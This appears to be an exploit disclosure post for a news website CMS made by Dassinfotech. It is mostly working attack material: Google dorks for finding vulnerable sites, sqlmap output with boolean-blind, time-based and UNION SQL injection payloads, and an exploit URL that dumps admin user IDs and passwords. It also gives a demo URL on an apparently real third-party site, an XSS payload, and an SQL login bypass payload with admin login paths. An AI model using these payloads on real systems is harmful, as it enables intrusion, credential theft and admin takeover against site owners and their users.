+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+ Exploit Title: News website CMS SQL injection & Bypass Admin Panel && XSS Vulnerability By Aryan Chehreghani
+ Date: 2020-06-05
+ Vendor Homepage: https://www.dassinfotech.com
+ Auxiliary software : http://sqlmap.org
+ Exploit Author : Aryan Chehreghani | Ictus_TM
+ Dork CVE: CVE-2019-13409
+ Dork CWE : CWE-89
+ Version: All Version
+ Tested on: win,linux,mac
###########################################################################################################################
+ Dork 1 : intext:Design by Dassinfotech.com
+ Dork 2 : inurl:detailsnews.php?id=
+ Dork 3 : intext:Design by Dassinfotech.com inurl:detailsnews.php?id=
+ Dork 4 : inurl:php?id= intext:Design By Dassinfotech.com
###########################################################################################################################
[SQL injection]
[+] Method ( Sql injection ) Ictus Security Team of Iran
[+] parameter : id = latestnews.php?catid=25
###########################################################################################################################
[+] Testing Method:
[+] - UNION query
__________SQLMAP__________result :
||||||||||||||||||||||| Parameter: sec (GET) || |||||||||||||||||||||||
arameter: catid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catid=15' AND 6574=6574 AND 'RCcd'='RCcd
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: catid=15' AND (SELECT 9314 FROM (SELECT(SLEEP(5)))mkCY) AND 'rCId'=
'rCId
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: catid=15' UNION ALL SELECT CONCAT(0x716b767171,0x6c746c51566743754d
72706e67777068776f58415443736f62786f4d716448795a6b56744f664a61,0x716a6a7071),NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L,NULL-- -
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
[+]Using Sqlmap Example : sqlmap -u http://target.com/latestnews.php?catid=25 --dbs
========================================================================|
Exploit ==>
latestnews.php?catid=-23%27%20union%20select%201,2,3,4,5,6,7,group_concat(userid,Password),9,10,11,12,13,14,15,16,17,18,19%20fRom%20admin--%20-
========================================================================|
Demo:
[+] http://ncrlife.in/latestnews.php?catid=25[SQL]
========================================================================|
[XSS Vulnerability]
[+] Method :"><script>alert('Aryan Chehreghani | Ictus_TM')</script><"
[+] Type Code IN search Value / some Value
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[Bypass Admin panel]
[+] Payload U / P : '=''or' / '=''or'
[+]Login Pages : victim.com/matri/login.php victim.com/india/login.php
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[=] T.me/Clvsornapv
[=] Telegram Channel ==> T.me/Ictus_TM